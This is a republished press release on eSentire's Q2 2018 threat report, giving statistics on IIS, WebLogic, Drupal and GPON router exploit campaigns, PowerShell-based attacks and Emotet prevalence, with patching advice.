Analysis of the attacks by eSentire Threat Intelligence revealed that both IIS and WebLogic exploits maintained a consistent number of attacks (about 200) per IP across organizations, with those attacks originating from servers hosting Apache, RDP, SQL, IIS, and HTTP API services.
Most sources targeting IIS web servers originated from China-based IP addresses. According to Shodan, there are 3.5 million IIS web servers exposed (with 1 million in China). The compromised servers largely originated from Tencent and Alibaba.
eSentire also noted an interesting collection of operating systems among the attacking infrastructure involved – over 400 of the attacking IPs had Shodan records indicating they were Windows machines (including XP, 7, 8, 2008, and 2012). Additionally, nearly 350 FTP servers and over 100 mail servers were reported; there were also VPN servers, MikroTik devices (reported as bandwidth-testing servers), Kangle, Squid, Jetty, and a handful of lesser-known web service technologies.
“IIS is a popular web server, with prevalence in the U.S. and China. Organizations using web servers need to make sure they monitor for these vulnerabilities and update or patch as necessary. Oracle WebLogic is another webserver that saw a lot of attacks and we’ve seen Apache attacks reported too,” said Kerry Bailey, CEO, eSentire. “Web servers are exposed de facto, which makes them a primary target, and we saw continued attacks against IIS continue in Q3 2018. IIS patches for earlier versions, like 6.0, are available. Otherwise, users should consider updating to more recent versions of the web server.”
Additional Q2 2018 report findings:
Top five most affected industries: biotechnology, accounting, real estate, marketing, and construction.
The most common execution tactic technique observed around endpoint solutions was the use of PowerShell (32%), followed by VBA scripting (21%). Of the PowerShell-based attacks observed, 83% used obfuscated command lines intended to hide their intentions.
· Emotet was the most frequently observed malware due to numerous version updates and feature additions since it was first reported in 2014.
The use of obfuscated PowerShell commands increased 50% from last quarter, partly due to contributions by Emotet.
Four observed exploit campaigns stood out targeting IIS, Drupal, WebLogic servers, and GPON routers. GPON home routers were attacked after the PoC code release (eSentire saw 5K detections total, with volume peaking on May 12). eSentire continues to see home router exploits through Q3.
The eSentire Threat Intelligence team used data gathered from 2,000+ proprietary network and host-based detection sensors distributed globally across multiple industries. Raw data was normalized and aggregated using automated machine-based processing methods. Processed data was reviewed by a visual data analyst applying quantitative analysis methods. Quantitative intelligence analysis results were further processed by a qualitative intelligence analyst resulting in a written analytical product.
eSentire’s 2018 Q2 Threat Report provides a quarterly snapshot, analyzing all cyber threat events investigated by the eSentire Security Operations Center (SOC), while addressing three key areas: threat types, threat volume, and attack types. Each topic is divided into multiple sections, including visual data analysis, written analytical analysis, practical recommendations, and key assumptions.
To access a complete copy of the report, visit: https://www.esentire.com/resources/knowledge/q2-2018-quarterly-threat-report.
eSentire® is the largest pure-play Managed Detection and Response (MDR) service provider, keeping organizations safe from constantly evolving cyber-attacks that technology alone cannot prevent. Its 24x7 Security Operations Center (SOC), staffed by elite security analysts, hunts, investigates, and responds in real-time to known and unknown threats before they become business disrupting events. Protecting more than $5.7 trillion AUM in the financial sector alone, eSentire absorbs the complexity of cybersecurity, delivering enterprise-grade protection and the ability to comply with growing regulatory requirements. For more information, visit www.esentire.com and follow @eSentire.
Products, service names, and company logos mentioned herein may be the registered trademarks of their respective owners. All rights reserved.
US President Donald Trump Photo: REUTERS WASHINGTON: S President Donald Trump sa [ ... ]
Two boys, part of a group of Hungarians visiting a mosque to learn about the Muslim [ ... ]
A photograph taken on November 5, 2015, shows volunteers of a cow protection vigilan [ ... ]
The WhatsApp messaging application is seen on a phone screen August 3, 2017. PHOTO: [ ... ]
PHOTO: AFP The divisional commander and nephew of the chief of Jaish-e-Mohammad, w [ ... ]
Page also said that he had proposed in May 2016 that Donald Trump travel to Russia t [ ... ]
An investor gestures as he monitors a screen displaying stock information in Riyadh, [ ... ]
PHOTO: EXPRESS MUZAFFARABAD: ommander 10 Corps Lieutenant General Nadeem Raza, o [ ... ]
US President Donald Trump and South Korea’s President Moon Jae-in shake hands duri [ ... ]
People are silhouetted against a backdrop projected with the picture of various curr [ ... ]
All depts given 10 days to submit their list of vacant posts. PHOTO: FILE ISLAMAB [ ... ]
PHOTO: PPI KARACHI: n accountability court reserved judgment on Monday on an app [ ... ]
Officer had been beaten up by protesters in 2014, was later suspended by govt. PHOTO [ ... ]
ISLAMABAD: t seems like multiple marches on the capital and massive protests thr [ ... ]
PML-N leadership continues to woo PPP support. PHOTO: ONLINE ISLAMABAD: t a [ ... ]
Child receives polio vaccination drops PHOTO: REUTERS LAHORE: unjab Primary and [ ... ]
Three-day conference on Iqbal commences. PHOTO: FILE ISLAMABAD: llama Iqbal rais [ ... ]
Foreign Minister Ahsan Iqbal. PHOTO: EXPRESS/FILE PESHAWAR: akistan’s economic [ ... ]
Last week, the Judicial Commission of Pakistan approved the elevation of eight judg [ ... ]
Bilawal Abro says the authority is working to eradicate adulteration and ensure food [ ... ]
EXPRESS NEWS SCREEN GRAB ATTOCK: akistan Tehreek-e-Insaf (PTI) Chairman Imran Kh [ ... ]
Just hours after the death of Mansour bin Muqrin, the son of former Saudi crown pr [ ... ]
Two men open fire on their wives and alleged paramours in separate incidents. PHOTO: [ ... ]
Iranian President Hassan Rowhani greets Army Chief General Qamar Javed Bajwa in Tehr [ ... ]
Three persons have also been apprehended along with the vehicle where the arms and a [ ... ]
Hira Akbar. PHOTO: Express SWAT: ourteen-year-old Hira Akbar has become the sec [ ... ]
PHOTO: File Leader of the Opposition in the National Assembly Khursheed Shah said [ ... ]
Traditional folk artists perform during the 274th urs of Shah Abdul Latif Bhitai. PH [ ... ]
The two male lions at the Masai Mara and Dr Ezekiel Mutua. PHOTO COURTESY: Nairobi T [ ... ]
PHOTO: AFP MARSEILLE: arseille said on Friday they had opened an inquiry after d [ ... ]
LAHORE: t is ironical to see that the same members of the provincial assembly of [ ... ]
KARACHI: he stock market hit a roadblock again on Thursday as investors failed to carr [ ... ]
Kate was treated last month for a severe form of pregnancy sickness. PHOTO: REUTERS [ ... ]
Islamabad High Court (IHC) Justice Shaukat Aziz Siddiqui. PHOTO: MUHAMMAD JAVAID I [ ... ]
North Korea, known for its florid insults, has described US President Donald Trump a [ ... ]
An Uber sign is seen in a car in New York, U.S. June 30, 2015 PHOTO: REUTERS Far-r [ ... ]
Outside the arcane world of finance reporting few will have been following the tal [ ... ]
In the first palpable sign that it is willing to accept the ineligibility of Nawaz [ ... ]
PHOTO: PPI QUETTA: nior Superintendent Police of Traffic Nazeer Kurd said on [ ... ]
Supreme Court of Pakistan. PHOTO: AFP/FILE ISLAMABAD: he National Party, an ally [ ... ]
The authority will incur up to Rs1 million in losses. PHOTO: EXPRESS ISLAMABAD: [ ... ]
PHOTO: AFP Questions regarding who earns what in cricket and who is the highest pa [ ... ]
PHOTO: FILE ISLAMABAD: he Employees Old-age Benefits Institution (EOBI) has cut [ ... ]
PHOTO: MQM-P Rejecting the results of the 2017 census, Muttahida Qaumi Movement-Pa [ ... ]
Representational image of a disabled person in a wheel chair. PHOTO: REUTERS LAHOR [ ... ]
According to the National Nutrition Survey, nearly 40 per cent of the children in S [ ... ]
PHOTO: FILE Atif Aslam’s jdar-e-Haram opened the eighth season of Coke Stu [ ... ]
That water is a critical resource for Pakistan and for all countries in the world [ ... ]
PHOTO: AFP BEIJING: hina wants Pakistan to seize the opportunity provided by CPE [ ... ]
The writer is a development anthropologist. He teaches at George Washington Universi [ ... ]
The head of the Russian foreign ministry's security and disarmament department Mikha [ ... ]
ISPR says suspects were involved in recent terror activities in Punjab. PHOTO:: EXPR [ ... ]
DPO vows fair probe of incident. PHOTO: FILE ABBOTTABAD: plastic surgeon who wa [ ... ]
Advisor to CM says they will try to resolve the issue within a week. PHOTO: FILE P [ ... ]
Iqbal Zafar Jhagra says police need to adapt to the changing scenario. PHOTO: FILE [ ... ]
KARACHI: he Sindh and federal government are embroiled in Pakistan Steel Mills’ land [ ... ]